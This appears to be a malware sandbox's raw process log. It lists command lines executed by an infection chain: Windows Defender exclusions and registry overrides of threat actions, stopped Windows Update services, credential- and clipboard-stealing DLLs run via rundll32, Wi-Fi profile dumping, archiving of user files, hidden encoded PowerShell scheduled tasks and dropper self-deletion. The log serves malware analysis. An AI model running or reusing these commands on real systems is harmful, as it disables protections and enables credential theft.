C:\ProgramData\Google\Chrome\updater.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C3AE.bat" "

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\33945c4f34\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\33945c4f34\Dctooux.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe"

C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe

"C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gkcnbQSJR"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bnTqljwkAIckBwCXiX" /SC once /ST 02:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe\" tC /pnsite_idROA 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0xe70040,0xe7004c,0xe70058

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\757987694264_Desktop.zip' -CompressionLevel Optimal

C:\Users\Admin\AppData\Local\Temp\1346.exe

C:\Users\Admin\AppData\Local\Temp\1346.exe

C:\Users\Admin\AppData\Local\Temp\1346.exe

C:\Users\Admin\AppData\Local\Temp\1346.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\a0e81e80-45cc-4456-972b-e9d648d8e4bd" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\313E.exe

C:\Users\Admin\AppData\Local\Temp\313E.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3940 -ip 3940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 1184

C:\Users\Admin\AppData\Local\Temp\1346.exe

"C:\Users\Admin\AppData\Local\Temp\1346.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\1346.exe

"C:\Users\Admin\AppData\Local\Temp\1346.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3216 -ip 3216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 572

C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe

C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe tC /pnsite_idROA 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FgzgbZZAFicU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FgzgbZZAFicU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LYowOqXOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LYowOqXOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PnlHXrUXYeUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PnlHXrUXYeUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xWNndLwYWxPLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xWNndLwYWxPLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOkirCjeoMUvNKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uOkirCjeoMUvNKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SafQccDpCMVtGOrp\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SafQccDpCMVtGOrp\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FgzgbZZAFicU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LYowOqXOU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LYowOqXOU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PnlHXrUXYeUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PnlHXrUXYeUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWNndLwYWxPLC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xWNndLwYWxPLC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOkirCjeoMUvNKVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOkirCjeoMUvNKVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SafQccDpCMVtGOrp /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SafQccDpCMVtGOrp /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gBGfdOZyo" /SC once /ST 01:33:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gBGfdOZyo"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

